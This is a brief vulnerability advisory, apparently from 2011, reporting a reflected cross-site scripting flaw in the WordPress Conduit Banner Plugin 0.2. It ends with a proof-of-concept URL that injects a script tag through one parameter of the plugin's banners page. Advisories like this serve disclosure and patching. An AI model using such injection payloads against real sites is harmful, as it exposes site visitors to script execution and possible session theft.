------------------------------------------------------------------------
Software................WordPress Conduit Banner Plugin 0.2
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.conduit.com/widget
Release Date............1/24/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--Description--

A reflected cross-site scripting vulnerability in WordPress Conduit
Banner Plugin 0.2 can be exploited to execute arbitrary JavaScript.


--PoC--
http://localhost/wordpress/wp-content/plugins/conduit-banner-selector/conduit-banner-selector-banners.php?category-field-id=&category-id=120x240&page=&banner-index-field-id=')"/><script>alert(0)</script>